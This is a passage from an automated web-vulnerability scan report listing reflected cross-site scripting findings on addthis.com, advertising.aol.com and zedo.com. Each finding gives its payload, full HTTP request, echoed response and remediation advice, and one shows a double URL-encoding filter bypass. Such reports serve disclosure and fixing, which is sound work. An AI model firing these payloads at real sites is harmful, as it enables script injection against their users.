This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=ee2d5%2522%253balert%25281%2529%252f%252f78792465b09

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:24:12 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 93275

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookmarking Sharing Button Widget</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
...[SNIP]...
b="";addthis_onload = [ function() { document.getElementById('filt').focus(); } ];addthis_url="http://www.google.com/search?hl=en&q=ee2d5%2522%253balert%25281%2529%252f%252f78792465b09";addthis_title="ee2d5";alert(1)//78792465b09 - 1 search";
var services = { 'facebook_comment':"Facebook Comment", 'facebook_uncomment':"Facebook Uncomment", '100zakladok':"100zakladok", '2tag':"2 Tag", '2linkme':"2linkme", '7live7':"7Live7.com"
...[SNIP]...

6.219. http://www.addthis.com/bookmark.php [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 26151%253cscript%253ealert%25281%2529%253c%252fscript%253e8d04ddad45 was submitted in the Referer HTTP header. This input was echoed as 26151<script>alert(1)</script>8d04ddad45 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=26151%253cscript%253ealert%25281%2529%253c%252fscript%253e8d04ddad45

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:24:14 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 93350

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookmarking Sharing Button Widget</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
...[SNIP]...
<h4>26151<script>alert(1)</script>8d04ddad45 - 1 search</h4>
...[SNIP]...

6.220. http://advertising.aol.com/nai/nai.php [token_nai_ad_us-ec_adtechus_com cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /nai/nai.php

Issue detail

The value of the token_nai_ad_us-ec_adtechus_com cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5ecfc'><script>alert(1)</script>e5db2b1c849 was submitted in the token_nai_ad_us-ec_adtechus_com cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /nai/nai.php?action_id=4 HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: token_nai_advertising_com=1170877546; token_nai_adsonar_com=1462706141; token_nai_tacoda_at_atwola_com=2011729621; token_nai_adtech_de=1144859041; token_nai_ad_us-ec_adtechus_com=5ecfc'><script>alert(1)</script>e5db2b1c849; token_nai_adserver_adtechus_com=2011695027; token_nai_adserverec_adtechus_com=737485457; token_nai_adserverwc_adtechus_com=585611182; token_nai_glb_adtechus_com=592246145

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:14:13 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache, max-age=1
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Expires: Sun, 04 Sep 2011 11:14:14 GMT
Content-Type: text/html
Content-Length: 13680


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script>

   // dynamic variables
   var numFrames = 9;
   var redirectUrlNoCookie = "http://www.networkadvertising.org/verify/no_cookie.gif";
   var redire
...[SNIP]...
<iframe id='frame_4' src='http://nai.ad.us-ec.adtechus.com/nai/daa.php?action_id=4&participant_id=4&rd=http%3A%2F%2Fadvertising.aol.com&nocache=6284731&token=5ecfc'><script>alert(1)</script>e5db2b1c849' height='1' width='1'>
...[SNIP]...

6.221. http://advertising.aol.com/nai/nai.php [token_nai_adserver_adtechus_com cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /nai/nai.php

Issue detail

The value of the token_nai_adserver_adtechus_com cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload df3e9'><script>alert(1)</script>bf8933df1c2 was submitted in the token_nai_adserver_adtechus_com cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /nai/nai.php?action_id=4 HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: token_nai_advertising_com=1170877546; token_nai_adsonar_com=1462706141; token_nai_tacoda_at_atwola_com=2011729621; token_nai_adtech_de=1144859041; token_nai_ad_us-ec_adtechus_com=1214941173; token_nai_adserver_adtechus_com=df3e9'><script>alert(1)</script>bf8933df1c2; token_nai_adserverec_adtechus_com=737485457; token_nai_adserverwc_adtechus_com=585611182; token_nai_glb_adtechus_com=592246145

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:14:20 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache, max-age=1
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Expires: Sun, 04 Sep 2011 11:14:21 GMT
Content-Type: text/html
Content-Length: 13680


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script>

   // dynamic variables
   var numFrames = 9;
   var redirectUrlNoCookie = "http://www.networkadvertising.org/verify/no_cookie.gif";
   var redire
...[SNIP]...
<iframe id='frame_5' src='http://nai.adserver.adtechus.com/nai/daa.php?action_id=4&participant_id=5&rd=http%3A%2F%2Fadvertising.aol.com&nocache=9620604&token=df3e9'><script>alert(1)</script>bf8933df1c2' height='1' width='1'>
...[SNIP]...

6.222. http://advertising.aol.com/nai/nai.php [token_nai_adserverec_adtechus_com cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /nai/nai.php

Issue detail

The value of the token_nai_adserverec_adtechus_com cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b20f7'><script>alert(1)</script>33ec0971207 was submitted in the token_nai_adserverec_adtechus_com cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /nai/nai.php?action_id=4 HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: token_nai_advertising_com=1170877546; token_nai_adsonar_com=1462706141; token_nai_tacoda_at_atwola_com=2011729621; token_nai_adtech_de=1144859041; token_nai_ad_us-ec_adtechus_com=1214941173; token_nai_adserver_adtechus_com=2011695027; token_nai_adserverec_adtechus_com=b20f7'><script>alert(1)</script>33ec0971207; token_nai_adserverwc_adtechus_com=585611182; token_nai_glb_adtechus_com=592246145

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:14:26 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache, max-age=1
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Expires: Sun, 04 Sep 2011 11:14:27 GMT
Content-Type: text/html
Content-Length: 13681


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script>

   // dynamic variables
   var numFrames = 9;
   var redirectUrlNoCookie = "http://www.networkadvertising.org/verify/no_cookie.gif";
   var redire
...[SNIP]...
<iframe id='frame_6' src='http://nai.adserverec.adtechus.com/nai/daa.php?action_id=4&participant_id=6&rd=http%3A%2F%2Fadvertising.aol.com&nocache=8751993&token=b20f7'><script>alert(1)</script>33ec0971207' height='1' width='1'>
...[SNIP]...

6.223. http://advertising.aol.com/nai/nai.php [token_nai_adserverwc_adtechus_com cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /nai/nai.php

Issue detail

The value of the token_nai_adserverwc_adtechus_com cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3a97f'><script>alert(1)</script>3f7f01dc4e was submitted in the token_nai_adserverwc_adtechus_com cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /nai/nai.php?action_id=4 HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: token_nai_advertising_com=1170877546; token_nai_adsonar_com=1462706141; token_nai_tacoda_at_atwola_com=2011729621; token_nai_adtech_de=1144859041; token_nai_ad_us-ec_adtechus_com=1214941173; token_nai_adserver_adtechus_com=2011695027; token_nai_adserverec_adtechus_com=737485457; token_nai_adserverwc_adtechus_com=3a97f'><script>alert(1)</script>3f7f01dc4e; token_nai_glb_adtechus_com=592246145

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:14:32 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache, max-age=1
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Expires: Sun, 04 Sep 2011 11:14:33 GMT
Content-Type: text/html
Content-Length: 13680


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script>

   // dynamic variables
   var numFrames = 9;
   var redirectUrlNoCookie = "http://www.networkadvertising.org/verify/no_cookie.gif";
   var redire
...[SNIP]...
<iframe id='frame_7' src='http://nai.adserverwc.adtechus.com/nai/daa.php?action_id=4&participant_id=7&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5560575&token=3a97f'><script>alert(1)</script>3f7f01dc4e' height='1' width='1'>
...[SNIP]...

6.224. http://advertising.aol.com/nai/nai.php [token_nai_adsonar_com cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /nai/nai.php

Issue detail

The value of the token_nai_adsonar_com cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ac77e'><script>alert(1)</script>9c7ae0ff0cc was submitted in the token_nai_adsonar_com cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /nai/nai.php?action_id=4 HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: token_nai_advertising_com=1170877546; token_nai_adsonar_com=ac77e'><script>alert(1)</script>9c7ae0ff0cc; token_nai_tacoda_at_atwola_com=2011729621; token_nai_adtech_de=1144859041; token_nai_ad_us-ec_adtechus_com=1214941173; token_nai_adserver_adtechus_com=2011695027; token_nai_adserverec_adtechus_com=737485457; token_nai_adserverwc_adtechus_com=585611182; token_nai_glb_adtechus_com=592246145

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:13:54 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache, max-age=1
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Expires: Sun, 04 Sep 2011 11:13:55 GMT
Content-Type: text/html
Content-Length: 13680


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script>

   // dynamic variables
   var numFrames = 9;
   var redirectUrlNoCookie = "http://www.networkadvertising.org/verify/no_cookie.gif";
   var redire
...[SNIP]...
<iframe id='frame_1' src='http://nai.adsonar.com/nai/daa.php?action_id=4&participant_id=1&rd=http%3A%2F%2Fadvertising.aol.com&nocache=3349423&token=ac77e'><script>alert(1)</script>9c7ae0ff0cc' height='1' width='1'>
...[SNIP]...

6.225. http://advertising.aol.com/nai/nai.php [token_nai_adtech_de cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /nai/nai.php

Issue detail

The value of the token_nai_adtech_de cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b5946'><script>alert(1)</script>f42efed0328 was submitted in the token_nai_adtech_de cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /nai/nai.php?action_id=4 HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: token_nai_advertising_com=1170877546; token_nai_adsonar_com=1462706141; token_nai_tacoda_at_atwola_com=2011729621; token_nai_adtech_de=b5946'><script>alert(1)</script>f42efed0328; token_nai_ad_us-ec_adtechus_com=1214941173; token_nai_adserver_adtechus_com=2011695027; token_nai_adserverec_adtechus_com=737485457; token_nai_adserverwc_adtechus_com=585611182; token_nai_glb_adtechus_com=592246145

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:14:07 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache, max-age=1
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Expires: Sun, 04 Sep 2011 11:14:08 GMT
Content-Type: text/html
Content-Length: 13680


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script>

   // dynamic variables
   var numFrames = 9;
   var redirectUrlNoCookie = "http://www.networkadvertising.org/verify/no_cookie.gif";
   var redire
...[SNIP]...
<iframe id='frame_3' src='http://nai.adtech.de/nai/daa.php?action_id=4&participant_id=3&rd=http%3A%2F%2Fadvertising.aol.com&nocache=8044609&token=b5946'><script>alert(1)</script>f42efed0328' height='1' width='1'>
...[SNIP]...

6.226. http://advertising.aol.com/nai/nai.php [token_nai_advertising_com cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /nai/nai.php

Issue detail

The value of the token_nai_advertising_com cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8b51c'><script>alert(1)</script>467abc54d81 was submitted in the token_nai_advertising_com cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /nai/nai.php?action_id=4 HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: token_nai_advertising_com=8b51c'><script>alert(1)</script>467abc54d81; token_nai_adsonar_com=1462706141; token_nai_tacoda_at_atwola_com=2011729621; token_nai_adtech_de=1144859041; token_nai_ad_us-ec_adtechus_com=1214941173; token_nai_adserver_adtechus_com=2011695027; token_nai_adserverec_adtechus_com=737485457; token_nai_adserverwc_adtechus_com=585611182; token_nai_glb_adtechus_com=592246145

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:13:48 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache, max-age=1
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Expires: Sun, 04 Sep 2011 11:13:49 GMT
Content-Type: text/html
Content-Length: 13680


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script>

   // dynamic variables
   var numFrames = 9;
   var redirectUrlNoCookie = "http://www.networkadvertising.org/verify/no_cookie.gif";
   var redire
...[SNIP]...
<iframe id='frame_0' src='http://nai.advertising.com/nai/daa.php?action_id=4&participant_id=0&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4119221&token=8b51c'><script>alert(1)</script>467abc54d81' height='1' width='1'>
...[SNIP]...

6.227. http://advertising.aol.com/nai/nai.php [token_nai_glb_adtechus_com cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /nai/nai.php

Issue detail

The value of the token_nai_glb_adtechus_com cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 28d5d'><script>alert(1)</script>7d5481ce816 was submitted in the token_nai_glb_adtechus_com cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /nai/nai.php?action_id=4 HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: token_nai_advertising_com=1170877546; token_nai_adsonar_com=1462706141; token_nai_tacoda_at_atwola_com=2011729621; token_nai_adtech_de=1144859041; token_nai_ad_us-ec_adtechus_com=1214941173; token_nai_adserver_adtechus_com=2011695027; token_nai_adserverec_adtechus_com=737485457; token_nai_adserverwc_adtechus_com=585611182; token_nai_glb_adtechus_com=28d5d'><script>alert(1)</script>7d5481ce816

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:14:38 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache, max-age=1
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Expires: Sun, 04 Sep 2011 11:14:39 GMT
Content-Type: text/html
Content-Length: 13681


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script>

   // dynamic variables
   var numFrames = 9;
   var redirectUrlNoCookie = "http://www.networkadvertising.org/verify/no_cookie.gif";
   var redire
...[SNIP]...
<iframe id='frame_8' src='http://nai.glb.adtechus.com/nai/daa.php?action_id=4&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5828861&token=28d5d'><script>alert(1)</script>7d5481ce816' height='1' width='1'>
...[SNIP]...

6.228. http://advertising.aol.com/nai/nai.php [token_nai_tacoda_at_atwola_com cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /nai/nai.php

Issue detail

The value of the token_nai_tacoda_at_atwola_com cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload fbc09'><script>alert(1)</script>5c24dbb879a was submitted in the token_nai_tacoda_at_atwola_com cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /nai/nai.php?action_id=4 HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: token_nai_advertising_com=1170877546; token_nai_adsonar_com=1462706141; token_nai_tacoda_at_atwola_com=fbc09'><script>alert(1)</script>5c24dbb879a; token_nai_adtech_de=1144859041; token_nai_ad_us-ec_adtechus_com=1214941173; token_nai_adserver_adtechus_com=2011695027; token_nai_adserverec_adtechus_com=737485457; token_nai_adserverwc_adtechus_com=585611182; token_nai_glb_adtechus_com=592246145

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:14:00 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache, max-age=1
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Expires: Sun, 04 Sep 2011 11:14:01 GMT
Content-Type: text/html
Content-Length: 13680


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script>

   // dynamic variables
   var numFrames = 9;
   var redirectUrlNoCookie = "http://www.networkadvertising.org/verify/no_cookie.gif";
   var redire
...[SNIP]...
<iframe id='frame_2' src='http://nai.tacoda.at.atwola.com/nai/daa.php?action_id=4&participant_id=2&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5974899&token=fbc09'><script>alert(1)</script>5c24dbb879a' height='1' width='1'>
...[SNIP]...

6.229. http://d7.zedo.com/bar/v16-504/d2/jsc/fm.js [ZEDOIDA cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-504/d2/jsc/fm.js

Issue detail

The value of the ZEDOIDA cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d464"-alert(1)-"4bce18ebbfb was submitted in the ZEDOIDA cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/d2/jsc/fm.js?c=4/2/1&a=0&f=&n=767&r=13&d=14&q=&$=&s=0&z=0.472774357534945 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
